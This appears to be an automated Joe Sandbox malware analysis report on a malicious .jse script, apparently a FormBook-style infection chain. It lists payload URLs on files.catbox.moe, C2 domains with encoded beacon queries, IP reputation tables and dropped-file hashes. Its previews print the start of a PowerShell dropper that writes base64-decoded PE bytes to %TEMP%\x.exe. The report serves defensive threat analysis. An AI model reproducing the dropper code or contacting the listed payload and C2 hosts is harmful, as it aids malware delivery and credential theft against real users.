                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.meacci.xyz/y3n2/?hJmlwzIP=YYHifcw1ROMF/3RuimpNfLhUsxuxcMKtO4hXXvbRKVUVh0h/q4DMqrOnAhjmriRcqxzsaBbGiU8bH2oMXqD7zJXTKDI0OQUw5wG7ZoblKeO6xygGb+5lBKM=&MXwP=r6KXAXfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.67051.app/fm7p/?hJmlwzIP=fBQGVIP7Njvsfk9lzVhNu8pCqf4YkOx9Vaqk3JyU25ETPeViuHfh6mR7/D77kz//dgcg4mAG64G/nkTmvcQD6acAcwOPjm8QE+VPRg3PkMui+g1AImFFsl0=&MXwP=r6KXAXfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.extremedoge.xyz/d8se/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.meacci.xyz/y3n2/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.67051.app/fm7p/false
                                    • Avira URL Cloud: safe
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabsxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1737883956.000002409007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1709755523.0000024081C13000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://files.catbox.moe/p53ou1.ps1Kwscript.exe, 00000000.00000002.1763091389.00000238360A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1760902166.000002383609F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1709755523.0000024081BB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.lifesentials.lifeW4ja93oMuuBdSP.exe, 0000000C.00000002.2896359779.0000000005619000.00000040.80000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://files.catbox.moe/p53ou1.ps1~wscript.exe, 00000000.00000002.1763354595.000002383873B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762268117.000002383873A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1709755523.0000024081BB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contoso.com/Licensepowershell.exe, 00000001.00000002.1709755523.0000024081C13000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/Iconpowershell.exe, 00000001.00000002.1709755523.0000024081C13000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://files.catbox.moe/wscript.exe, 00000000.00000002.1763354595.000002383873B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762268117.000002383873A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.ecosia.org/newtab/sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1709755523.0000024081BB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ac.ecosia.org/autocomplete?q=sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://files.catbox.moe;wscript.exe, 00000000.00000002.1762829492.0000023836038000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761838105.0000023837FC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762094087.0000023836038000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761581136.0000023836038000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://files.catbox.moe/p53ou1.ps1hwscript.exe, 00000000.00000002.1763354595.000002383873B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762268117.000002383873A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://files.catbox.moe/p53ou1.ps1f:CreateObjectwscript.exe, 00000000.00000003.1760985865.000002383603E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1762922730.0000023836053000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761200387.0000023836052000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761046609.0000023836047000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761123761.000002383604D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://files.catbox.moe/gnwscript.exe, 00000000.00000002.1763354595.000002383873B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762268117.000002383873A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://contoso.com/powershell.exe, 00000001.00000002.1709755523.0000024081C13000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1737883956.000002409007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1709755523.0000024081C13000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://oneget.orgXpowershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://files.catbox.moe/p53ou1.ps1uwscript.exe, 00000000.00000003.1654347834.0000023837DA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762348747.0000023837D9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761373232.0000023837D99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1654525933.0000023837DA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1654610745.0000023837DA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1763266792.0000023837D9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.1709755523.0000024080001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://files.catbox.moewscript.exe, 00000000.00000002.1762829492.0000023836038000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761838105.0000023837FC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762094087.0000023836038000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761581136.0000023836038000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1709755523.0000024080001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sxstrace.exe, 00000008.00000002.2897184888.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://oneget.orgpowershell.exe, 00000001.00000002.1709755523.0000024081630000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs
                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                13.248.169.48
                                                                                                www.brothersharetender.xyzUnited States
                                                                                                16509AMAZON-02UStrue
                                                                                                198.2.236.221
                                                                                                www.zltbd.topUnited States
                                                                                                54600PEGTECHINCUSfalse
                                                                                                23.225.159.42
                                                                                                r0lqcud7.nbnnn.xyzUnited States
                                                                                                40065CNSERVERSUSfalse
                                                                                                108.181.20.35
                                                                                                files.catbox.moeCanada
                                                                                                852ASN852CAfalse
                                                                                                103.215.78.119
                                                                                                www.67051.appHong Kong
                                                                                                24000LIHGL-AS-AP24hkglobalBGPHKfalse
                                                                                                63.250.47.57
                                                                                                www.lifesentials.lifeUnited States
                                                                                                22612NAMECHEAP-NETUSfalse
                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                Analysis ID:1595900
                                                                                                Start date and time:2025-01-21 13:18:05 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 8m 14s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:13
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:2
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • GSI enabled (Javascript)
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:11001_10032.jse
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.expl.evad.winJSE@16/8@11/6
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 66.7%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 96%
                                                                                                • Number of executed functions: 123
                                                                                                • Number of non-executed functions: 294
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .jse
                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.61
                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                • Execution Graph export aborted for target W4ja93oMuuBdSP.exe, PID 4856 because it is empty
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 3196 because it is empty
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                TimeTypeDescription
                                                                                                07:18:59API Interceptor6x Sleep call for process: powershell.exe modified
                                                                                                07:19:50API Interceptor3660284x Sleep call for process: sxstrace.exe modified
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                13.248.169.48PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.woca.group/72ra/
                                                                                                Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.woca.group/72ra/
                                                                                                Payment Details rar.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.autonomousoid.pro/mnv3/
                                                                                                New order BPD-003777.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.satoshichecker.xyz/0hyc/
                                                                                                Doc.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.carfie.xyz/5ang/
                                                                                                PO#3210046374.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.carfie.xyz/5ang/
                                                                                                Payment Slip rar.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.autonomousoid.pro/mnv3/
                                                                                                New order BPD-003777.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.blockconnect.tech/yrw8/
                                                                                                New order BPD-003777.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.blockconnect.tech/yrw8/
                                                                                                Sample images and Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.londonatnight.coffee/13to/?gh=bB5xwtYh&B6=z2EgoPQiqWsx10s8imXn9EhLUqHIpfNm2M9hnivL2yIwQ5T5ZMz+m2ngmAV/UVpa818CagjxjfYFH/Xhgr0digC17IWeZfaY6JjaVHEq2uwg8Vf8Lg==
                                                                                                23.225.159.42suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.laohub10.net/n2c9/
                                                                                                uG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.laohub10.net/sgdd/
                                                                                                YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.laohub10.net/36be/
                                                                                                New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                                                                • www.laohub10.net/dfeq/
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                www.lifesentials.lifeDoc.exeGet hashmaliciousFormBookBrowse
                                                                                                • 63.250.47.57
                                                                                                files.catbox.moeNEW ORDER HD_FORD_000003.jsGet hashmaliciousMassLogger RATBrowse
                                                                                                • 108.181.20.35
                                                                                                SecorKit.batGet hashmaliciousXWormBrowse
                                                                                                • 108.181.20.35
                                                                                                Quote - 840 Tons of Reinforcing Steel.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                • 108.181.20.35
                                                                                                scan file.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                                • 108.181.20.35
                                                                                                BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                • 108.181.20.35
                                                                                                1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                • 108.181.20.35
                                                                                                c2.htaGet hashmaliciousRemcosBrowse
                                                                                                • 108.181.20.35
                                                                                                DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                • 108.181.20.35
                                                                                                doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 108.181.20.35
                                                                                                TT copy.jsGet hashmaliciousFormBookBrowse
                                                                                                • 108.181.20.35
                                                                                                r0lqcud7.nbnnn.xyzqbSIgCrCgw.exeGet hashmaliciousFormBookBrowse
                                                                                                • 202.79.161.151
                                                                                                02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • 27.124.4.246
                                                                                                1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                                                                • 23.225.160.132
                                                                                                suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                                                • 23.225.159.42
                                                                                                AxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
                                                                                                • 27.124.4.246
                                                                                                tfWjjV1LdT.exeGet hashmaliciousFormBookBrowse
                                                                                                • 27.124.4.246
                                                                                                uG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                                                                                • 23.225.159.42
                                                                                                M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                                                                • 202.79.161.151
                                                                                                order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                                • 27.124.4.246
                                                                                                UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                                                • 23.225.159.42
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                PEGTECHINCUSPayment Details rar.exeGet hashmaliciousFormBookBrowse
                                                                                                • 198.2.236.252
                                                                                                Payment Slip rar.exeGet hashmaliciousFormBookBrowse
                                                                                                • 198.2.236.252
                                                                                                J1VpshZJfm.exeGet hashmaliciousFormBookBrowse
                                                                                                • 198.2.214.227
                                                                                                frosty.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                • 45.205.88.140
                                                                                                sora.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                • 154.195.146.220
                                                                                                empsl.elfGet hashmaliciousMiraiBrowse
                                                                                                • 156.243.156.233
                                                                                                garm.elfGet hashmaliciousMiraiBrowse
                                                                                                • 156.247.76.163
                                                                                                garm5.elfGet hashmaliciousMiraiBrowse
                                                                                                • 156.247.76.117
                                                                                                earm5.elfGet hashmaliciousMiraiBrowse
                                                                                                • 156.243.156.211
                                                                                                earm.elfGet hashmaliciousMiraiBrowse
                                                                                                • 156.247.76.154
                                                                                                ASN852CA154.213.189.141-arm-2025-01-21T03_19_06.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                • 162.156.115.130
                                                                                                arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                • 104.205.180.190
                                                                                                star.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                • 104.205.36.209
                                                                                                NEW ORDER HD_FORD_000003.jsGet hashmaliciousMassLogger RATBrowse
                                                                                                • 108.181.20.35
                                                                                                i686.elfGet hashmaliciousUnknownBrowse
                                                                                                • 108.180.193.169
                                                                                                main_ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                • 207.81.169.125
                                                                                                frosty.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                • 154.5.79.162
                                                                                                XWorm RAT V2.1.exeGet hashmaliciousNjrat, XWormBrowse
                                                                                                • 108.181.22.211
                                                                                                SecorKit.batGet hashmaliciousXWormBrowse
                                                                                                • 108.181.20.35
                                                                                                Quote - 840 Tons of Reinforcing Steel.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                • 108.181.20.35
                                                                                                AMAZON-02USPURCHASE-000927736615551143.cmd.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                • 18.141.10.107
                                                                                                https://signdoc.knowmore.website/landingPage/2/6b0d5682d7c711ef95e30242ac120007Get hashmaliciousUnknownBrowse
                                                                                                • 52.49.133.118
                                                                                                https://inquiryreservrguest5040.worldGet hashmaliciousHTMLPhisher, CAPTCHA Scam ClickFixBrowse
                                                                                                • 13.32.99.94
                                                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                                                • 54.171.230.55
                                                                                                https://whatsapp.dianjin-inc.comGet hashmaliciousUnknownBrowse
                                                                                                • 52.95.156.86
                                                                                                SARS LETTER OF DEMAND 2025.docxGet hashmaliciousUnknownBrowse
                                                                                                • 18.157.237.165
                                                                                                mips.elfGet hashmaliciousMiraiBrowse
                                                                                                • 54.171.230.55
                                                                                                https://https.docusign.click/XcXdqUGdUTUNaN2tKbFYxRUdGbUVZWmwxeGVONzJNYlptRkJvZ2RHM1gwSXlNWnB6WmgzMFg3L3l4a0I0YituVUVFWU81UWNjZnRpOFhDTDlHOGpSNXIrd29Ed0pIemZMOVRsVU5CRnNnWWVrcHBWSi95c0dmUUNYa2ZoK1drYmoxU0l5V2x5MlVWaHYvRTJNMldGR3BtaEF1WlRFa1MyaUV2YjJZc3hsaUE0T3ZYOWpNOWRpa2lNY0dYYnk4czdwdDdvMnU3UT0tLUV6S0xZRUNEKzBGYzJjTGet hashmaliciousUnknownBrowse
                                                                                                • 34.242.252.151
                                                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                                                • 34.249.145.219
                                                                                                i686.elfGet hashmaliciousMoobotBrowse
                                                                                                • 54.171.230.55
                                                                                                CNSERVERSUShttp://65528086365.com/Get hashmaliciousUnknownBrowse
                                                                                                • 23.225.67.83
                                                                                                Fedex 22122024 overdue invoicesxlx..exeGet hashmaliciousFormBookBrowse
                                                                                                • 156.251.153.28
                                                                                                zTrDsX9gXl.dllGet hashmaliciousWannacryBrowse
                                                                                                • 156.251.148.1
                                                                                                xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                • 154.91.155.178
                                                                                                xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                • 23.225.91.14
                                                                                                RFQ PC25-1301 Product Specifications_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                • 172.247.15.142
                                                                                                https://b45032.com/Get hashmaliciousUnknownBrowse
                                                                                                • 154.86.18.242
                                                                                                C6Abn5cBei.exeGet hashmaliciousFormBookBrowse
                                                                                                • 154.88.22.107
                                                                                                1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                                                                • 23.225.160.132
                                                                                                suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                                                • 23.225.159.42
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                37f463bf4616ecd445d4a1937da06e19jmkykhjksefkyt.exeGet hashmaliciousVidarBrowse
                                                                                                • 108.181.20.35
                                                                                                Setup (1).exeGet hashmaliciousUnknownBrowse
                                                                                                • 108.181.20.35
                                                                                                https://github.com/Tarun999000/dfds/releases/download/fvxc/Order.receipt.845755-800.zipGet hashmaliciousPureCrypter, AsyncRAT, Meduza StealerBrowse
                                                                                                • 108.181.20.35
                                                                                                lambo.dllGet hashmaliciousUnknownBrowse
                                                                                                • 108.181.20.35
                                                                                                lambo.dllGet hashmaliciousUnknownBrowse
                                                                                                • 108.181.20.35
                                                                                                mlqhQcgLKr.msiGet hashmaliciousUnknownBrowse
                                                                                                • 108.181.20.35
                                                                                                doc00250120.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                                • 108.181.20.35
                                                                                                NEW ORDER HD_FORD_000003.jsGet hashmaliciousMassLogger RATBrowse
                                                                                                • 108.181.20.35
                                                                                                tKENar6l1f.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                • 108.181.20.35
                                                                                                Youv9KCvB2.exeGet hashmaliciousUnknownBrowse
                                                                                                • 108.181.20.35
                                                                                                No context
                                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                                File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1058936
                                                                                                Entropy (8bit):4.4159888426476055
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:KHIXl9845I98GA4KaGsiuCtSESUdzx3ZnETSBr/FW1mJ6DsZuMANT1jNes:K+l9VeKGA4KactVx3ZETSBr8EJcwuMAZ
                                                                                                MD5:F9A0EBECDD04F895DA55B1BC5E156A89
                                                                                                SHA1:2316A761A352732ACFD2B8FEAFC1C0DAEB1A89B3
                                                                                                SHA-256:670F998A86EE4BDD239096F3799D9B0845ACF4A20ABAEE5D7E59CC83DAC9117E
                                                                                                SHA-512:EFFE8578F930F6B3A4DF83A5850F4F2620451686A9D90E8EB93C75C06A6381E35A416FCB6962BE9E6F2D440A7956036EDD09DC6C993E02F465B40A934C705C1E
                                                                                                Malicious:true
                                                                                                Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAMf7O+AAAAAAAAAAAOAAAgELATAAABQMAAAIAAAAAAAATjMMAAAgAAAAQAwAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACADAAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAPwyDABPAAAAAEAMAMYFAAAAAAAAAAAAAAAAAAAAAAAAAGAMAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAVBMMAAAgAAAAFAwAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAMYFAAAAQAwAAAYAAAAWDAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAMAAACAAAAHAwAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAwMwwAAAAAAEgAAAACAAUAWEcAAKTrCwADAAAADAAABqBGAAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKFIAAAoqEzAJAG0CAAABAAARACB6N1fIIDsSILZhJQ0fC15FCwAAABoAAABCAQAAagEAAAUAAABMAAAA5QAAAJQAAACrAAAAVwAAAL////8jA
                                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                File Type:CSV text
                                                                                                Category:dropped
                                                                                                Size (bytes):226
                                                                                                Entropy (8bit):5.360398796477698
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                Malicious:false
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                                File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1058936
                                                                                                Entropy (8bit):4.4159888426476055
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:KHIXl9845I98GA4KaGsiuCtSESUdzx3ZnETSBr/FW1mJ6DsZuMANT1jNes:K+l9VeKGA4KactVx3ZETSBr8EJcwuMAZ
                                                                                                MD5:F9A0EBECDD04F895DA55B1BC5E156A89
                                                                                                SHA1:2316A761A352732ACFD2B8FEAFC1C0DAEB1A89B3
                                                                                                SHA-256:670F998A86EE4BDD239096F3799D9B0845ACF4A20ABAEE5D7E59CC83DAC9117E
                                                                                                SHA-512:EFFE8578F930F6B3A4DF83A5850F4F2620451686A9D90E8EB93C75C06A6381E35A416FCB6962BE9E6F2D440A7956036EDD09DC6C993E02F465B40A934C705C1E
                                                                                                Malicious:false
                                                                                                Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAMf7O+AAAAAAAAAAAOAAAgELATAAABQMAAAIAAAAAAAATjMMAAAgAAAAQAwAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACADAAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAPwyDABPAAAAAEAMAMYFAAAAAAAAAAAAAAAAAAAAAAAAAGAMAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAVBMMAAAgAAAAFAwAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAMYFAAAAQAwAAAYAAAAWDAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAMAAACAAAAHAwAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAwMwwAAAAAAEgAAAACAAUAWEcAAKTrCwADAAAADAAABqBGAAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKFIAAAoqEzAJAG0CAAABAAARACB6N1fIIDsSILZhJQ0fC15FCwAAABoAAABCAQAAagEAAAUAAABMAAAA5QAAAJQAAACrAAAAVwAAAL////8jA
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):1.1628158735648508
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:NlllulLhwlz:NllUO
